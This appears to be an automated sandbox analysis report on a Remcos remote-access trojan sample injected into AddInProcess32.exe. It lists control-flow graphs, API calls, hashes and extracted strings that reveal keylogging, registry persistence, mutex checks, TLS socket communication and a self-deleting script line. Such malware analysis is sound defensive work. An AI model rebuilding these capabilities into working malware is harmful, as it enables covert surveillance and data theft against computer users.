                                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                  • API String ID: 2830904901-2361045106
                                                  • Opcode ID: f715ff3ff54d136703a75f8961ec53d9cafdc8201a11b649ad2ef43c457609be
                                                  • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                  • Opcode Fuzzy Hash: f715ff3ff54d136703a75f8961ec53d9cafdc8201a11b649ad2ef43c457609be
                                                  • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 448 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 461 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 448->461 462 414faf-414fb6 Sleep 448->462 477 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->477 478 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->478 462->461 477->478 531 415127-41512e 478->531 532 415119-415125 478->532 533 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 531->533 532->533 560 415210-41521e call 40482d 533->560 561 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 533->561 566 415220-415246 call 402093 * 2 call 41b580 560->566 567 41524b-415260 call 404f51 call 4048c8 560->567 584 415ade-415af0 call 404e26 call 4021fa 561->584 566->584 583 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 567->583 567->584 648 4153bb-4153c8 call 405aa6 583->648 649 4153cd-4153f4 call 401fab call 4135e1 583->649 597 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 584->597 598 415b18-415b20 call 401e8d 584->598 597->598 598->478 648->649 655 4153f6-4153f8 649->655 656 4153fb-415a45 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->656 655->656 901 415a4a-415a51 656->901 902 415a53-415a5a 901->902 903 415a65-415a6c 901->903 902->903 906 415a5c-415a5e 902->906 904 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 903->904 905 415a6e-415a73 call 40b08c 903->905 917 415aac-415ab8 CreateThread 904->917 918 415abe-415ad9 call 401fd8 * 2 call 401f09 904->918 905->904 906->903 917->918 918->584
                                                  APIs
                                                  • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                  • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                  • Sleep.KERNELBASE(00000000,00000002), ref: 00415B12
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$ErrorLastLocalTime
                                                  • String ID: | $%I64u$5.1.2 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                  • API String ID: 524882891-1591215765
                                                  • Opcode ID: 38bc6fdb8f32bb0be9cb961f15c12f5f40c3f8b4c62ea3eb76f8c84527a844be
                                                  • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                  • Opcode Fuzzy Hash: 38bc6fdb8f32bb0be9cb961f15c12f5f40c3f8b4c62ea3eb76f8c84527a844be
                                                  • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                  Control-flow Graph

                                                  APIs
                                                  • Sleep.KERNELBASE(00001388), ref: 0040A77B
                                                    • Part of subcall function 0040A6B0: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                    • Part of subcall function 0040A6B0: CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
                                                  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A7B7
                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A7C8
                                                  • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7DF
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                  • API String ID: 3795512280-1152054767
                                                  • Opcode ID: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                  • Opcode Fuzzy Hash: fcc29488dd826d1e3e905d90cfd1e685e258c9bd02a7bd2fd8e0a043009058da
                                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1023 4048c8-4048e8 connect 1024 404a1b-404a1f 1023->1024 1025 4048ee-4048f1 1023->1025 1028 404a21-404a2f WSAGetLastError 1024->1028 1029 404a97 1024->1029 1026 404a17-404a19 1025->1026 1027 4048f7-4048fa 1025->1027 1030 404a99-404a9e 1026->1030 1031 404926-404930 call 420cf1 1027->1031 1032 4048fc-404923 call 40531e call 402093 call 41b580 1027->1032 1028->1029 1033 404a31-404a34 1028->1033 1029->1030 1045 404941-40494e call 420f20 1031->1045 1046 404932-40493c 1031->1046 1032->1031 1035 404a71-404a76 1033->1035 1036 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1033->1036 1038 404a7b-404a94 call 402093 * 2 call 41b580 1035->1038 1036->1029 1038->1029 1055 404950-404973 call 402093 * 2 call 41b580 1045->1055 1056 404987-404992 call 421ad1 1045->1056 1046->1038 1085 404976-404982 call 420d31 1055->1085 1069 4049c4-4049d1 call 420e97 1056->1069 1070 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1056->1070 1082 4049d3-4049f6 call 402093 * 2 call 41b580 1069->1082 1083 4049f9-404a14 CreateEventW * 2 1069->1083 1070->1085 1082->1083 1083->1026 1085->1029
                                                  APIs
                                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                  • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                  • API String ID: 994465650-2151626615
                                                  • Opcode ID: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                  • Opcode Fuzzy Hash: 45ff517fd2582d6e0a202418ab4ffabcdb2540000aed43e3d88e52077495edcf
                                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                  Control-flow Graph

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                  • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                  • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                  • String ID:
                                                  • API String ID: 3658366068-0
                                                  • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                  • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                  • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                  Control-flow Graph

                                                  APIs
                                                  • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                  • Sleep.KERNELBASE(000001F4), ref: 0040AD7E
                                                  • GetForegroundWindow.USER32 ref: 0040AD84
                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                  • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                  • API String ID: 911427763-3954389425
                                                  • Opcode ID: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                  • Opcode Fuzzy Hash: 1d1453891d5a0c3fd18e7847a2101c1b07e014a2f3fd082d5303374a996e40ae
                                                  • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1195 40da6f-40da94 call 401f86 1198 40da9a 1195->1198 1199 40dbbe-40dbe4 call 401f04 GetLongPathNameW call 40417e 1195->1199 1200 40dae0-40dae7 call 41c048 1198->1200 1201 40daa1-40daa6 1198->1201 1202 40db93-40db98 1198->1202 1203 40dad6-40dadb 1198->1203 1204 40dba9 1198->1204 1205 40db9a-40db9f call 43c11f 1198->1205 1206 40daab-40dab9 call 41b645 call 401f13 1198->1206 1207 40dacc-40dad1 1198->1207 1208 40db8c-40db91 1198->1208 1223 40dbe9-40dc56 call 40417e call 40de0c call 402fa5 * 2 call 401f09 * 5 1199->1223 1224 40dae9-40db39 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1224 1225 40db3b-40db87 call 40417e call 43c11f call 40417e call 402fa5 call 401f13 call 401f09 * 2 1200->1225 1211 40dbae-40dbb3 call 43c11f 1201->1211 1202->1211 1203->1211 1204->1211 1215 40dba4-40dba7 1205->1215 1227 40dabe 1206->1227 1207->1211 1208->1211 1220 40dbb4-40dbb9 call 409092 1211->1220 1215->1204 1215->1220 1220->1199 1233 40dac2-40dac7 call 401f09 1224->1233 1225->1227 1227->1233 1233->1199
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DBD5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                  • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                  • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1294 41c482-41c493 1295 41c495-41c498 1294->1295 1296 41c4ab-41c4b2 1294->1296 1298 41c4a1-41c4a9 1295->1298 1299 41c49a-41c49f 1295->1299 1297 41c4b3-41c4cc CreateFileW 1296->1297 1300 41c4d2-41c4d7 1297->1300 1301 41c4ce-41c4d0 1297->1301 1298->1297 1299->1297 1303 41c4f2-41c503 WriteFile 1300->1303 1304 41c4d9-41c4e7 SetFilePointer 1300->1304 1302 41c510-41c515 1301->1302 1306 41c505 1303->1306 1307 41c507-41c50e CloseHandle 1303->1307 1304->1303 1305 41c4e9-41c4f0 CloseHandle 1304->1305 1305->1301 1306->1307 1307->1302
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                  • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                  • CloseHandle.KERNELBASE(00000000), ref: 0041C508
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                  • String ID: xpF
                                                  • API String ID: 1852769593-354647465
                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1308 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1319 41b3ad-41b3bc call 4135e1 1308->1319 1320 41b3ee-41b3f7 1308->1320 1325 41b3c1-41b3d8 call 401fab StrToIntA 1319->1325 1321 41b400 1320->1321 1322 41b3f9-41b3fe 1320->1322 1324 41b405-41b410 call 40537d 1321->1324 1322->1324 1330 41b3e6-41b3e9 call 401fd8 1325->1330 1331 41b3da-41b3e3 call 41cffa 1325->1331 1330->1320 1331->1330
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                    • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                    • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 1866151309-2070987746
                                                  • Opcode ID: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                  • Opcode Fuzzy Hash: 619bc13ef983509798e4cc56ab9e00072be03ad0848662060b437d2fd6fbf6a7
                                                  • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1382 40a6b0-40a6c0 1383 40a6c6-40a6c8 1382->1383 1384 40a75d-40a760 1382->1384 1385 40a6cb-40a6f1 call 401f04 CreateFileW 1383->1385 1388 40a731 1385->1388 1389 40a6f3-40a701 GetFileSize 1385->1389 1390 40a734-40a738 1388->1390 1391 40a703 1389->1391 1392 40a728-40a72f CloseHandle 1389->1392 1390->1385 1393 40a73a-40a73d 1390->1393 1394 40a705-40a70b 1391->1394 1395 40a70d-40a714 1391->1395 1392->1390 1393->1384 1396 40a73f-40a746 1393->1396 1394->1392 1394->1395 1397 40a716-40a718 call 40b117 1395->1397 1398 40a71d-40a722 Sleep 1395->1398 1396->1384 1399 40a748-40a758 call 409097 call 40a1b4 1396->1399 1397->1398 1398->1392 1399->1384
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: XQG
                                                  • API String ID: 1958988193-3606453820
                                                  • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                  • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                  • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread$LocalTimewsprintf
                                                  • String ID: Offline Keylogger Started
                                                  • API String ID: 465354869-4114347211
                                                  • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                  • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                  APIs
                                                  • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137E1
                                                  • RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.1.2 Pro), ref: 004137EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: pth_unenc
                                                  • API String ID: 1818849710-4028850238
                                                  • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                  • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                  • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                  • GetLastError.KERNEL32 ref: 0040D0BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: SG
                                                  • API String ID: 1925916568-3189917014
                                                  • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                  • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                  • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                  APIs
                                                  • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                  • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventObjectSingleWaitsend
                                                  • String ID:
                                                  • API String ID: 3963590051-0
                                                  • Opcode ID: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
                                                  • Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
                                                  • Opcode Fuzzy Hash: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
                                                  • Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                  • RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                  • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                  • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                  APIs
